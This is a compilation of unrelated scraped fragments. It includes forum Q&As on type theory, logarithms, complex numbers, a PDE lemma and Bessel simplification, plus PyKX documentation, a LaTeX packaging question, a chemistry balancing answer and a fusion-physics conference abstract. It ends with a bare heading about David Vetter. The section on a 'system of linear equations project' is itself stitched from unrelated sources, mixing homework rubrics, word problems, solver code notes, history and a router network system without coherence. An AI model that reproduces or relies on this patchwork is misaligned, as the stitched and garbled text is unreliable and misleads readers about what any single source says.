• Yes, lots of alternatives (Quine's NF, ZFC, etc), but I can't see any direct connections between the foundational crisis and programming languages. If you consider Martin-Löf's type theory as a programming language, there might be some connection there reaching back to intuitionism. As regards the semantics of programming languages, there are some basic languages like PDL (Propositional Dynamic Logic) which have Kripke (or possible worlds) semantics. But types seem to me so fundamental that they might just be behind the scenes :) – Hunan Rostomyan Aug 15 '13 at 4:28
• But types are kind of a bummer: you want and need them, but you'd love to not have to specify them (hence, IMHO, why we have type inference systems in languages like Haskell or Ocaml (I love those languages)). At the other end of the spectrum, Python feels very intuitive and it is pleasant (and efficient in terms of coding time) to not have to worry too much about types in that language. Maybe type inference is the best of both worlds - but that's the engineer talking. I was just daydreaming that maths could contribute another significant concept (like types) to computer science :-) – Frank Aug 15 '13 at 4:38
• @Frank Every time I use a language without static types (mostly Ruby) I hate the experience, because I hate avoidable runtime errors. So, that seems to be a matter of taste mostly. I agree that powerful type inference can give you the best of both worlds. Which is, probably, why I like Scala so much. – Raphael Aug 15 '13 at 10:19
• I am not convinced that not having types "automatically" leads to runtime errors, as you seem to imply :-) I never had a problem in Python. – Frank Aug 15 '13 at 14:37
Since you mention Python, the question is not purely type-theoretic. So I will try to give a broader perspective on types. Types are different things to different people. I've collected at least 5 distinct (but related) notions of types:
1. Type systems are logical systems and set theories.
2. A type system associates a type with each computed value. By examining the flow of these values, a type system attempts to prove or ensure that no type errors can occur.
3. Type is a classification identifying one of various types of data, such as real-valued, integer or Boolean, that determines the possible values for that type; the operations that can be done on values of that type; the meaning of the data; and the way values of that type can be stored
4. Abstract data types allow for data abstraction in high level languages. ADTs are often implemented as modules: the module's interface declares procedures that correspond to the ADT operations. This information hiding strategy allows the implementation of the module to be changed without disturbing the client programs.
5. Programming language implementations use types of values to choose the storage the values need and algorithms for operations on the values.
The quotes are from Wikipedia, but I can provide better references should a need arise.
Types-1 arose from Russell's work, but today they do not merely protect from paradoxes: the typed language of homotopy type theory is a new way to encode mathematics in a formal, machine-understandable language, and a new way for humans to understand the foundations of mathematics. (The "old" way is an encoding using an axiomatic set theory.)
Types 2-5 arose in programming from several different needs, respectively: to avoid bugs, to classify the data software designers and programmers work with, to design large systems, and to implement programming languages efficiently.
Type systems in C/C++, Ada, Java, Python did not arise out of Russell's work or a desire to avoid bugs. They arose out of needs to describe the different kinds of data out there (e.g. "last name is a character string and not a number"), to modularize software design, and to choose low-level representations for data optimally. These languages have no types-1 or types-2. Java ensures relative safety from bugs not by proving program correctness using its type system, but by careful design of the language (no pointer arithmetic) and runtime system (virtual machine, bytecode verification). The type system in Java is neither a logical system nor a set theory.
However, the type system of the Agda programming language is a modern variant of Russell's type system (based on the later work of Per Martin-Löf and other mathematicians). The type system in Agda is designed to express mathematical properties of programs and proofs of those properties; it is a logical system and a set theory.
There is no black-and-white distinction here: many languages fit in between. For example, the type system of the Haskell language has roots in Russell's work and can be viewed as a simplified version of Agda's system, but from a mathematical standpoint it is inconsistent (self-contradictory) if viewed as a logical system or a set theory.
However, as a practical vehicle to protect Haskell programs from bugs, it works pretty well. You can even use types to encode certain properties and their proofs, but not all properties can be encoded, and the programmer can still violate the proved properties by using discouraged dirty hacks.
The type system of Scala is even further from Russell's work and Agda's perfect proof language, but it still has roots in Russell's work.
As for proving properties of industrial languages whose type systems were not designed for that, there are many approaches and systems.
For interesting but different approaches, see Coq and Microsoft Boogie research project. Coq relies on type theory to generate imperative programs from Coq programs. Boogie relies on annotation of imperative programs with properties and proving those properties with Z3 theorem prover using a completely different approach than Coq.
|
# Library limitations
When q is run embedded within a Python process (as opposed to over IPC), it is restricted in how it can operate. This is a result of the fact that when running embedded it does not have the main loop or timers that one would expect from a typical q process. The following are a number of examples showing these limitations in action
## IPC Interface
As a result of the lack of a main loop PyKX cannot be used to respond to q IPC requests as a server. Callback functions such as .z.pg defined within a Python process will not operate as expected.
In a Python process, start a q IPC server:
>>> import pykx as kx
>>> kx.q('\\p 5001')
pykx.Identity(pykx.q('::'))
>>>
Then in a Python or q process, attempt to connect to it:
>>> import pykx as kx
>>> q = kx.QConnection(port=5001) # Attempt to create a q connection to a pykx embedded q instance
# Will hang indefinitely since the embedded q process cannot respond to IPC requests
// Attempting to create an IPC connection to a PyKX embedded q instance
// will hang indefinitely since the embedded q process cannot respond to IPC requests
q)h: hopen ::5001
Do not use PyKX as an IPC server
Attempting to connect to a Python process running PyKX over IPC from another process will hang indefinitely.
## Timers
Timers in q rely on the use of the q main loop, as such these do not work within PyKX. For example:
>>> import pykx as kx
>>> kx.q('.z.ts:{0N!x}') # Set callback function which should be run on a timer
>>> kx.q('\t 1000') # Set timer to tick every 1000ms
pykx.Identity(pykx.q('::')) # No output follows because the timer doesn't actually tick when within
# a Python process
Attempting to use the timer callback function directly using PyKX will raise an AttributeError as follows
>>> kx.q.z.ts
AttributeError: ts: .z.ts is not exposed through the context interface because the main loop is inactive in PyKX.
|
# data scalar import command
Syntax
data scalar import s <keyword>
Import scalars from file s. The extension scalar is added automatically if one is not given.
The file format (text or binary) is determined by opening the file and looking for the appropriate header. If the proper header is not found, an error is indicated and no data imported. If the group keyword is specified, imported scalars are assigned the specified group name. In the event of a conflict, this group assignment overrides any in the import file. The relevant file formats are fully documented in Scalar Text File Format and Scalar Binary File Format.
group s <slot s >
Assign the group name s to the slot Default. The optional slot keyword can be used to specify a different slot.
|
Solving permutations and combinations - solving for a variable: find the value of r in 6Pr = 30.
Jan 22, 2018
$r = 2$
Explanation:
For this problem, I will use the simplest way possible to solve it.
Remember that $nPr = \frac{n!}{(n-r)!}$.
For $6Pr = 30$, we have:
$\frac{6!}{(6-r)!} = 30 \implies \frac{720}{(6-r)!} = 30$
Dividing both sides by $30$ gives:
$(6-r)! = \frac{720}{30} = 24$
Now, we try to think of our basic factorial numbers:
$1! = 1$
$2! = 2$
$3! = 6$
$4! = 24$
Oh! $6 - r$ must equal 4...!
We can now solve the equation:
$6 - r = 4$
$- r = - 2$
$r = 2$
|
Let z be a complex number such that |z - 5 - i| = 5. Find the minimum value of $$|z - 1 + 2i|^2 + |z - 9 - 4i|^2$$.
Let z be a complex number such that z^5 = 1 and $$z \neq 1$$. Compute $$z + \frac{1}{z} + z^2 + \frac{1}{z^2}.$$
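A quick way to evaluate the second expression (my sketch - the thread itself is unanswered): since $z^5 = 1$ and $z \neq 1$,

$$1 + z + z^2 + z^3 + z^4 = 0, \qquad \frac{1}{z} = z^4, \qquad \frac{1}{z^2} = z^3,$$

so

$$z + \frac{1}{z} + z^2 + \frac{1}{z^2} = z + z^4 + z^2 + z^3 = -1.$$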
Apr 18, 2019
|
system of linear equations project
In the last few weeks, we have talked about systems of linear equations and learned several methods to solve systems, including graphing, elimination, and substitution. Systems of linear equations are a useful way to solve common problems in different areas of life: one of the most powerful ways to use them is in a comparison model, where two similar situations are compared side by side to determine which one is better. These problems can be solved by using two or more variables and writing a system of equations, though some students may choose to solve some of the problems with a single variable and equation. If we translate an application to a mathematical setup using two variables, then we need to form a linear system with two equations; we are no longer limited to using one variable when setting up equations that model applications.

Car-buying project (subjects: Algebra, Applied Math, Word Problems; grades 7-9; due February 13, 2014 - no late projects accepted): in this project, you will be using systems of linear equations to decide which car to buy. Students select from two different types of cars, one being a hybrid car and the other a "gas guzzler". For example, you found a 2012 Chevy Camaro with an original price of $23,280 and a fuel tank capacity of 19 gal, while Sam found a 2012 Toyota Prius with an original price of $29,805. You must use each method for solving systems of equations (graphing, substitution, and elimination), one method per question, and choose a row - horizontal, vertical, or diagonal - from the tic-tac-toe board provided.

Example word problems: Jim can run and dribble a basketball at 10 meters per second; Bob can do the same at 5 meters per second with a 7.5-meter head start - after how many seconds are they at the same distance? Shrek has completed 10 Onion Plushies for the children at Swampville Elementary and will complete 5 more per day; Fiona has not completed any yet, but has a load of free time and can make 10 per day - when will they have made the same number?

Some useful facts. Any system of linear equations has exactly one of the following exclusive conclusions: (a) no solution, (b) a unique solution, or (c) infinitely many solutions. A linear system is said to be consistent if it has at least one solution, and inconsistent if it has no solution. Two linear systems using the same set of variables are equivalent if each equation of the second system can be derived algebraically from the equations of the first system, and vice versa; equivalent systems have the same solutions. To get a unique solution with 2 unknowns you need at least 2 equations: 1 equation in 2 unknowns is represented by an entire line, 2 non-redundant consistent equations are exactly enough, and 3 or more equations are too many. Given a linear system of three equations in three unknowns: pick any pair of equations and solve for one variable, pick another pair of equations and solve for the same variable, then solve the resulting two-by-two system.

Software project (deadline: Tuesday, April 4, 2017, at the beginning of class): a solver for linear systems of equations using Crout and Doolittle matrix decomposition algorithms in Python, done as part of a mini project in an algorithms course. The algorithms used to solve the system of linear equations are Gaussian elimination and the Gauss-Seidel method; this project also includes finding the inverse of a matrix using LDU decomposition. Direct methods covered: inverse of a matrix, Cramer's rule, Gauss-Jordan, Montante. Iterative methods: Jacobi, Gauss-Seidel. Nonlinear equation systems: Newton's method (1st and 2nd order); a related forum question asks for the proper code to solve a system of non-linear equations in Mathcad 15, for a problem related to thermodynamics. To download a copy of the project, go to its main page on GitHub and click on "Clone or …".

History: around 4000 years ago, the people of Babylon knew how to solve a simple 2x2 system of linear equations with two unknowns. Around 200 BC, the Chinese published the "Nine Chapters of the Mathematical Art", which displayed the ability to solve a 3x3 system of equations (Perotti). The power and progress in matrices and their applications did not come to fruition until the late 17th century.

Related projects use systems of non-linear differential equations, which are very useful in epidemiology: they can model various epidemics, including the bubonic plague, influenza, AIDS, the 2015 Ebola outbreak in West Africa, and most currently the coronavirus. Another project explores the limitations of Euler's method: for some differential equations, such as stiff equations, Euler's method can be numerically unstable.

Worked example (network flow): data is transmitted over a network to five routers at a total rate of 100 + 50 = 150 Mbps. Writing x1, ..., x5 for the rates on the individual links, the known values given in the project yield the system

2x1 + x2 = 100 (a)
x1 + x2 - x3 - x4 = 0 (b)
x1 - x3 - x5 = 50 (c)
x2 - x4 - x5 = 120 (d)
x2 + x3 - x4 + x5 = 0 (e)
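As a quick sketch in the project's language (Python) - using NumPy's built-in solver rather than the hand-rolled Gaussian elimination the project implements - the network-flow system above can be solved directly; the matrix rows follow equations (a)-(e):

```python
import numpy as np

# Coefficient matrix for unknowns x1..x5, one row per equation (a)-(e).
A = np.array([
    [2, 1,  0,  0,  0],   # (a) 2*x1 + x2          = 100
    [1, 1, -1, -1,  0],   # (b) x1 + x2 - x3 - x4  = 0
    [1, 0, -1,  0, -1],   # (c) x1 - x3 - x5       = 50
    [0, 1,  0, -1, -1],   # (d) x2 - x4 - x5       = 120
    [0, 1,  1, -1,  1],   # (e) x2 + x3 - x4 + x5  = 0
], dtype=float)
b = np.array([100, 0, 50, 120, 0], dtype=float)

print(np.linalg.solve(A, b))  # the unique solution, since A is nonsingular
```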
|
I am studying an article of Berestycki-Caffarelli-Nirenberg - Monotonicity for elliptic equations in unbounded Lipschitz domains - and I don't understand a convergence step in the proof of Lemma 3.4.
Suppose that $u\in C^2(\Omega)\cap C(\overline\Omega)$, such that $$\left\{ \begin{array}{rl} \Delta u+f(u)=0, & in \ \Omega,\\ u=0, & on \ \partial\Omega,\\ 0<u<1, & in \ \Omega, \end{array} \right.$$ where $\Omega=\{x=(x',x_n)\in\mathbb{R}^n\times\mathbb{R};x_n>\varphi(x')\}$, with $\varphi$ is a Lipschitz function.
LEMMA 3.4: For any $h>0$, the solution $u$ is bounded away from $1$ in $\Omega_h=\{x\in\Omega;\varphi(x')<x_n<\varphi(x')+h\}$.
Sketch of the proof: Suppose by contradiction that there exists a sequence $(x'^j,x_n^j)_j=(x^j)_j\subset\Omega_h$ such that $u(x^j)\rightarrow1$. By the translation $T^j(x)=x-x^j$ we move the set $\Omega$ to $\Omega^j$, given by $$\Omega^j=\{z=(z',z_n)\in\mathbb{R}^n;z_n>\varphi^j(z')=\varphi(z'+x'^j)-x_n^j\}.$$ It is easy to verify that the functions $\varphi^j$ are Lipschitz continuous and uniformly bounded on compact sets, so, by the Arzelà-Ascoli theorem, a subsequence of the $\varphi^j$ tends to a function $\widehat\varphi$. For each set $\Omega^j$ you have a shifted solution $$u^j(z',z_n)=u(z'+x'^j,z_n+x_n^j),$$ satisfying $$\left\{ \begin{array}{rl} \Delta u^j+f(u^j)=0, & in \ \Omega^j,\\ u^j=0, & on \ \partial\Omega^j,\\ 0<u^j<1, & in \ \Omega^j, \end{array} \right.$$
FINALLY, the doubt: In the article, he says that the shifted solutions converge uniformly in compact subsets of $$\widehat\Omega=\{x\in\mathbb{R}^n;x_n>\widehat\varphi(x')\},$$ to a solution $\widehat u$ that satisfies $$\left\{ \begin{array}{rl} \Delta \widehat u+f(\widehat u)=0, & in \ \widehat\Omega,\\ \widehat u=0, & on \ \partial\widehat\Omega,\\ \end{array} \right.$$
If the initial sequence $(x^j)_j$ were bounded, I could argue that this implies the claim (because on compact sets the shifted solutions and their first and second derivatives would be uniformly continuous and uniformly bounded, so one could apply the Arzelà-Ascoli theorem). But I think the sequence could be unbounded; I don't know. Can someone help me with this argument?
Thank you.
First of all, you should think of the sequence $(x^j)$ as unbounded, because if it had a finite limit, we'd immediately hit a contradiction: $x^j\to x\in \partial \Omega$, $u\in C(\overline{\Omega})$, and $u(x)=0$.
The reason for convergence of shifted solutions on compact sets is also Arzela-Ascoli, but we need uniform continuity on an unbounded set, which does not come for free.
Claim: For any $C>1$ the solution $u$ is uniformly Lipschitz on the set $\Omega_C=\{x: C^{-1}\le d(x)\le C\}$ where $d(x)=\operatorname{dist}(x,\partial\Omega)$.
Proof. The function $u$ solves the Poisson equation $\Delta u = g$ where $g=f\circ u$. Notice that both $u$ and $g$ are bounded in $\Omega$. The standard inner regularity result for the Poisson equation (Theorem 3.9 in Gilbarg-Trudinger) implies that $\nabla u$ is uniformly bounded in $\Omega_C$. (Why? Because any point $x\in \Omega_C$ is the center of a ball of radius $C^{-1}$ contained in $\Omega$. Apply the theorem on this ball, and recall that $u$ and $\Delta u$ are uniformly bounded.) It follows that $u$ is Lipschitz on $\Omega_C$. $\Box$
When we fix a compactly contained subdomain $G\Subset \widehat{\Omega}$ and consider the restrictions $u^j$ to $G$, we are actually looking at the restriction of $u$ to a subset of $\Omega_C$. Hence $u^j$ are uniformly Lipschitz on $G$. Since $f$ is Lipschitz and $\Delta u^j=f(u^j)$, it follows that the sequence $\Delta u^j$ is uniformly Lipschitz as well. By Theorem 4.6 in Gilbarg-Trudinger, this implies uniform Hölder continuity of all second-order derivatives of $u^j$.
Therefore, we can choose a subsequence, still denoted $u^j$, such that both $u^j$ and $D^2 u^j$ converge uniformly on $G$. Say, $u^j\to \widehat{u}$ and $\Delta u^j \to g$. We should check that $\Delta \widehat{u}=g$. To that end, pick a test function $\psi$ supported in $G$, and observe that $$\int u^j\Delta\psi\to \int \widehat{u}\,\Delta\psi\tag{1}$$ $$\int \Delta u^j \,\psi\to \int g\,\psi\tag{2}$$ Since $\int u^j\Delta\psi = \int \Delta u^j \,\psi$ (integration by parts), the combination of (1) and (2) implies $\Delta \widehat{u}=g$.
Why the sequence $x^j$ can not converge to a point in the interior of $\Omega$? – Tomás Jan 23 '13 at 0:28
@Tomás Good point. If $x^j\to x\in\Omega$ then $u(x)=1$, contradicting an earlier result in the paper, Theorem 1.2 (a). – user53153 Jan 23 '13 at 0:35
Why the laplacian converges in $\widehat\Omega$? What is the explanation to $\Delta\widehat u+f(\widehat u)=0$ in $\widehat\Omega$? – José Carlos Jan 24 '13 at 18:59
@JoséCarlos Since $\Delta u_j = -f(u^j)$, the functions $\Delta u_j$ also form a uniformly convergent sequence. Uniform convergence of $u_j$ and $\Delta u_j$ implies uniform convergence of all derivatives of 1st and 2nd order. Indeed, take $v=u^j-u^k$ and apply Poisson equation estimates from Chapter 3 of GT to $u$. – user53153 Jan 24 '13 at 19:34
I still have two doubts. First of all, before reading this article, I thought that to define a sequence of functions, the functions would need to be defined on the same set, but in this case we have a different set for each $u^j$. Is this not a problem? In the end, for each compact set $K$, we have to consider the restriction of the sequence to the compact set, ok? My second doubt is about your second answer. Could you explain better why the first and second derivatives are uniformly convergent? Thank you very much, you are helping me a lot. – José Carlos Jan 25 '13 at 15:43
|
1. ## Complex Number
Can help me to solve this?
1. Given that $(1+5i)p-2q=3+7i$, find the values of p and q when p and q are respectively a complex number and its conjugate.
2. Given that the complex number z and its conjugate z* satisfy the equation $zz*+2zi=12+6i$, find the possible values of z.
3. Given that z=x+yi and $w= \frac {z+8i}{z-6}$. If w is totally imaginary, show that $x^2+y^2+2x-48=0$.
1. p=2-i, q=2+i
2. 3-i, 3+3i
2. Originally Posted by cloud5
3. Given that z=x+yi and $w= \frac {z+8i}{z-6}$. If w is totally imaginary, show that $x^2+y^2+2x-48=0$.
We solved a problem like this one in this thread: http://www.mathhelpforum.com/math-he...ex-number.html
3. Going a bit backwards here:
Originally Posted by cloud5
2. Given that the complex number z and its conjugate z* satisfy the equation $zz*+2zi=12+6i$, find the possible values of z.
$zz*+2zi=12+6i$
If $z = a + bi$, then $z* = a - bi$:
\begin{aligned}
(a + bi)(a - bi) + 2(a + bi)i &= 12+6i \\
a^2 + b^2 + 2ai -2b &= 12 + 6i \\
(a^2 + b^2 - 2b) + 2ai &= 12 + 6i
\end{aligned}
Now equate the real and imaginary coefficients:
\begin{aligned}
a^2 + b^2 - 2b &= 12 \\
2a &= 6 \\
a &= 3 \\
9 + b^2 - 2b &= 12 \\
b^2 - 2b -3 &= 0 \\
(b - 3)(b + 1) &= 0 \\
b &= 3\;\;{\color{red}or} \\
b &= -1
\end{aligned}
So the answers, in the form of a + bi, are
3 + 3i and
3 - i.
Originally Posted by cloud5
1. Given that $(1+5i)p-2q=3+7i$, find the values of p and q when p and q are respectively a complex number and its conjugate.
This looks like the same problem as #2. Substitute a + bi for p and a - bi for q. Set the real and imaginary coefficients equal to each other and solve for a and b.
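Completing that suggestion (my sketch, not part of the original reply): with $p = a + bi$ and $q = a - bi$,

$$(1+5i)(a+bi) - 2(a-bi) = (-a - 5b) + (5a + 3b)i = 3 + 7i,$$

so $-a - 5b = 3$ and $5a + 3b = 7$, giving $b = -1$ and $a = 2$, i.e. $p = 2 - i$ and $q = 2 + i$, matching the stated answer.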
|
# how to organise common preamble of dtx files
I have some new packages (see latexthesistemplate/trunk/packages/template
which all use a shared preamble file. I want all of them to have the same packages and commands available and the same layout. These packages shall be uploaded to ctan as soon as the documentation is final.
I could place these preamble files in every dtx file, but that would just be extra work. Or I could create a new class file just for my own package documentation.
However, we already have so many undocumented package-documentation classes that I do not want to add another one - especially since I miss a lot of functionality in the standard documentation class.
Is there any other option?
-
It appears to be only three files, so I'd just include them in each dtx file, it isn't so much extra considering all the rest of the documentation overhead.
However If you do want a special class file for this, to pick up on your comment about lacking functionality from the standard class, there is no need to lose functionality. Just make a mydoc.cls that looks like
\ProvidesClass{mydoc}
\LoadClassWithOptions{ltxdoc}
Then your class will have all the same functionality and options as ltxdoc
|
# More log questions.
## Main Question or Discussion Point
I have a couple more log questions I'm stuck on. They keep giving me log questions that they never showed me how to do... very frustrating!
I need to evaluate the following logarithms:
68 a). log22^log55
I dont even know where to begin.. I never done a log with an exponent log???
69. $\log_2 5 = \log_2(x+32) - \log_2 x$
Determine the derivative of:
70 c) y= 2x^3 e^4x
e) y= square root(x^3 + e^-x +5)
I know this one should probably go to $(x^3 + e^{-x} + 5)^{1/2}$... then,
$dy/dx = (x^3 + e^{-x} + 5)^{1/2} \cdot \frac{1}{2}(x^3 + e^{-x} + 5)^{-1/2} \cdot (3x^2)$... now I'm confused??? Does the $e^{-x}$ have a derivative?? Like $-xe^{-2}$?? I've got no idea.
THANKZ YA!
Last edited:
For part a, is that
$$(\log_{2}2)^{\log_{5}5}$$ or $$\log_{2}(2)^{\log_{5}5}$$?
umm there are no brackets, but i think the 2 is in part with the log2
Pyrrhus
Homework Helper
Hrm
$$\log_{5} 5 = 1$$
$$5^1 = 5$$
$$log_{2} 5= log_{2} (x+32) - log_{2} x$$
$$log_{2} 5= log_{2} \frac{x+32}{x}$$
$$5 = \frac{x+32}{x}$$
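Finishing the algebra from here (my addition - the original post stops at this step):

$$5x = x + 32 \;\Rightarrow\; 4x = 32 \;\Rightarrow\; x = 8.$$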
Last edited:
|
# Simplify 5 square root of 7 - 4x square root of 7 - x square root of 7
Combine the like radical terms (the intermediate step is elided on the original page, but the simplification is direct):
$$5\sqrt{7} - 4x\sqrt{7} - x\sqrt{7} = 5\sqrt{7} - 5x\sqrt{7} = (5 - 5x)\sqrt{7}$$
# Plot a curve on a lattice
How do I plot a 2d curve and label lattice points to one side of it?
I want to plot the curve $f[x]=\frac{1}{x}$, and draw a solid red dot at every lattice point in the following set: $$\{(m,n)\in \mathbb N^2\colon mn\geq 1\}$$
• Make a lattice with Tuples, filter it with Select, plot with ListPlot, combine it with the curve using Show. Jul 23, 2015 at 6:37
• You can add something like Epilog -> {Red, Point[Flatten[Array[List, {5, 5}], 1]]} to your plot. Jul 23, 2015 at 6:41
In V10.1 or later, you can use CoordinateBoundingBoxArray to generate the lattice.
With[{m = 5}, pts = Flatten[CoordinateBoundingBoxArray[{{1, 1}, {m, m}}], 1]; (* assuming the default unit spacing *)
 Show[Plot[1/x, {x, 1/m, m}], ListPlot[pts, PlotStyle -> Red], PlotRange -> All]]
|
# How to simplify an expression with special functions to zero
The following is a well-known Bessel function identity:
$$J_{-n}(z)=(-1)^n J_n(z),\qquad n\in\mathbb Z$$
To check this, I used the following code and the result is as what I expected.
In[2]:= FullSimplify[(-1)^n*BesselJ[n, z] == BesselJ[-n, z], n ∈ Integers]
Out[2]= True
The problem is that Mathematica does not return zero when I try to simplify the following expression:
$$(-1)^n J_{n}(z)-J_{-n}(z),\qquad n\in\mathbb Z$$
I tried the following code, but the output is as complex as the input:
In[3]:= FullSimplify[(-1)^n*BesselJ[n, z] - BesselJ[-n, z], n ∈ Integers]
Out[3]= -BesselJ[-n, z] + (-1)^n BesselJ[n, z] (*result I expected : 0*)
My goal is to command Mathematica to reduce the expression to zero, and I need some advice.
See also: Why FullSimplify doesn't work here? – becko Nov 19 '13 at 14:53
FullSimplify[(-1)^n*BesselJ[n, z] - BesselJ[-n, z], n ∈ Integers,
ComplexityFunction -> (StringLength @ ToString @ # &)]
Also:
ComplexityFunction -> (Count[#, _BesselJ | _Power, {-2}] &)
ComplexityFunction -> (Count[#, _?NumberQ, Infinity] &)
I daresay it is baffling that the usual approach of comparing LeafCount[]s doesn't work... – J. M. May 15 '13 at 16:50
@J.M. ComplexityFunction -> (StringLength @ ToString @ # &) could be useful at the code golf site – belisarius May 15 '13 at 17:59
Actually, I don't know what (StringLength @ ToString @ # &) means. Nonetheless, I got some clues from looking at the other two options. The options you suggested are quite informative and could be utilized in many similar situations. – Tom Wayne May 16 '13 at 8:41
@Tom, it simply treats the expression being applied to as a string, and counts the number of characters in said string. – J. M. May 16 '13 at 11:19
@J.M. Now I got it. That's quite a compact form. – Tom Wayne May 17 '13 at 14:02
A bit of cheating:
DifferenceRootReduce[(-1)^n BesselJ[n, z] - BesselJ[-n, z], n]
0
I must admit I'm not sure why FullSimplify[] fails on this, tho.
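Presumably DifferenceRootReduce succeeds because, viewed as functions of $n$, both $(-1)^n J_n(z)$ and $J_{-n}(z)$ satisfy the same second-order recurrence $f_{n+1} = -\frac{2n}{z}\,f_n - f_{n-1}$ with the same values at $n = 0, 1$, so their difference normalizes to the zero solution.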
Very nice. – belisarius May 15 '13 at 15:50
That's a brilliant answer. Still, it's a mystery why FullSimplify doesn't work on this expression. – Tom Wayne May 15 '13 at 16:10
|
# How do you balance Co(OH)_3 + HNO_3 -> Co(NO_3)_3 + H_2O?
Apr 5, 2017
#### Answer:
$Co(OH)_3 + 3HNO_3 \rightarrow Co(NO_3)_3 + 3H_2O$
#### Explanation:
You really have to know your complex ions for this one!
On the left side of the equation we see, initially, one nitrate group ($NO_3$). On the right, we have three. So that means on the left we need three nitrate groups, which means three $HNO_3$ (aka nitric acid).
$Co(OH)_3 + 3HNO_3 \rightarrow Co(NO_3)_3 + H_2O$ (not balanced)
Now, on the left side of the unbalanced equation we have six hydrogens, but on the right we only have two. We can fix that by putting a coefficient of 3 in front of the water:
$Co(OH)_3 + 3HNO_3 \rightarrow Co(NO_3)_3 + 3H_2O$
Now we see that all the hydrogens balance out on both sides (six and six), all the nitrate groups balance out (three and three), the cobalt is balanced (one and one), and the oxygen (not counting the oxygen we have with the nitrate groups we already counted!) is also balanced (three and three).
Notice what I did here: I treated the nitrate groups as distinct species and balanced them as a whole, even though the nitrate group contains both nitrogen and oxygen! If you think about it, you will probably realize that I could have done the same thing with the hydroxide groups--water is just a hydroxide group with an extra hydrogen.
Now try a few and see if treating the complex ions as individual species works for you.
|
# 28th IAEA Fusion Energy Conference (FEC 2020)
10-15 May 2021
Nice, France
Europe/Vienna timezone
The Conference will be held virtually from 10-15 May 2021
## Transport Physics of the Density Limit
13 May 2021, 08:30
4h
Nice, France
Regular Poster Magnetic Fusion Theory and Modelling
### Speaker
P.H. Diamond (UCSD, USA)
### Description
The Greenwald density limit ($\bar{n}_g$) defines a fundamental bound on the tokamak operating space, and so is of central importance to magnetic fusion. Recent experiments (1) reinforce the suggestion (2) that the density limit occurs due to an abrupt increase in edge particle transport, with edge cooling and MHD phenomena following as secondary consequences. Here, we present a theory of degraded particle confinement as $\bar{n} \to \bar{n}_g$ due to edge shear layer collapse. The crucial microphysics is a breakdown of the self-regulating turbulence–shear flow feedback loop, due to a drop in flow production. Electron adiabaticity characterizes the parameter regimes. Favorable scaling of particle transport and density with current, like the Greenwald $\bar{n} \sim I_p$, emerges from the effect of neoclassical screening on zonal flow production. Higher current strengthens zonal flow shear for fixed drive. Zonal flow screening physics has implications for the scaling of the density limit in different devices.
Theoretical work (3) has identified the transition from adiabatic ($\alpha = \frac{k_\parallel^2 V_{th}^2}{\omega \nu} >1$) to hydrodynamic ($\alpha < 1$) electrons with increasing $n$ as a cause of the drop in Reynolds stress-driven production of shear flows, consistent with fluctuation studies close to the density limit (1). These are shown in Fig. 1. The physics mechanism is a transition from a regime of propagating drift waves, which generate a flow convergence and so a shear layer spin-up, to one of weakly propagating convective cells, with a consequently weak coherence of $\tilde v_r$ with $\tilde v_\theta$. In the latter, eddy tilting (symptomatic of flow generation) does not arise as a straightforward consequence of causality. Fig. 2 shows the scaling of transport fluxes with $\alpha$. Note that the particle flux increases for $\alpha <1$, while the vorticity gradient decreases there. This indicates that self-regulation fails in the hydrodynamic regime. Observe that the vorticity gradient ($\nabla u$) is a natural order parameter for the flow and superior to shear for prediction of suppression, since $\nabla u$ prevents local alignment of eddies with flow shear. Shear layer collapse is consistent with potential vorticity (PV—also total charge) conservation. However, for the $\alpha >1$ regime, PV fluxes of particles and vorticity (i.e. transport and zonal flow) are tightly coupled. For $\alpha <1$, the particles carry the PV flux. Thus, the different regimes manifest different branching ratios of the components of the PV flux, but the same total flux.
Flow–fluctuation–transport feedback is shown in Fig. 3. This suggests a unified picture of: the L-mode as a state of modest shear flow, the Density Limit as a state of weak flow, and the H-mode as a state of strong mean shear. The onset of the density limit by shear layer collapse emerges as a transport bifurcation.
Favorable current scaling is a salient feature of the Greenwald Limit. Theoretical work has identified the neoclassical ‘screening’ of the sheared zonal flow (ZF) as the physical mechanism underpinning the favorable $I_p$ scaling. Since the effective ZF scale is set by $\rho_\theta$ (4), effective ZF inertia is lower for larger current. An approximate scaling
$\tilde v_E^\prime \approx \frac{S_{k,q}}{\rho_i^2 + 1.6 \epsilon^{3/2}_T \rho_{\theta_i}^2} \sim \frac{ \sigma \left(\frac{e \phi}{T} \right)^2_{DW}}{\rho_{\theta_i}^2} \sim \sigma B_\theta ^2 \left(\frac{e \phi}{T} \right)^2_{DW}$
follows. $\left(\frac{e \phi}{T} \right)^2_{DW}$ is the drift wave intensity and $\sigma \sim n^{-\alpha}$ represents production. Higher current strengthens ZF shear, for fixed drive. DW-driven nonlinear noise scales $\sim B_\theta^4$, ensuring persistent excitation of the edge shear layer with increasing $B_\theta$. We see that reduced screening at high $I_p$ can “prop-up” the shear layer vs. weaker production. Favorable current scaling persists in the (ion) banana and plateau regimes, but weakens deep into the Pfirsch–Schlüter regime, also consistent with shear layer collapse at high $n$.
These results have implications for devices other than tokamaks. RFPs are known to exhibit ‘Greenwald-like’ scaling, $\bar{n}_g \sim I_p$. This is not surprising, since in an RFP $\rho_i$ is set by the poloidal field, i.e. $\rho_i = \rho_{\theta i}$, so classical zonal flow screening is weaker (ZF shear stronger) at high $I_p$. In stellarators, the principal correction to classical screening is due to helically trapped particles. This has no obvious length scale (5), so ZF screening is classical. This feature likely explains why attempts to link stellarator density limits to magnetic geometry have failed, and why stellarator density limits appear higher than those in tokamaks.
Ongoing work is concerned with analysis of perturbative experiments of shear layer collapse and with studies of zonal flow evolution in layers with variable $\alpha(r)$. Of particular interest are bias-driven shear studies, which attempt to enhance shear layer persistence beyond $\bar{n}_g$, and elucidate the local dynamics of the density limit.
Research is supported by the U.S. DOE, and CNNC and MOST, China.
(1) R. Hong, et al., Nucl. Fusion 58, 016041 (2018)
(2) M. Greenwald, PPCF 44, 2194 (2002)
(3) R. Hajjar, P.H. Diamond, M. Malkov, PoP 25, 062306 (2018)
(4) M.N. Rosenbluth, F.L. Hinton, Phys. Rev. Lett. 80, 724 (1998)
(5) H. Sugama, T.H. Watanabe, PoP 13, 012501 (2006)
Affiliation University of California, San Diego United States
### Primary author
P.H. Diamond (UCSD, USA)
### Co-authors
R. Singh (UCSD, USA) Dr M. Malkov (UCSD, USA) R. Hajjar (UCSD, USA) G. Tynan (UCSD, USA) T. Long (SWIP, China) Rui Ke (SWIP, China)
|
## David Vetter, the bubble boy
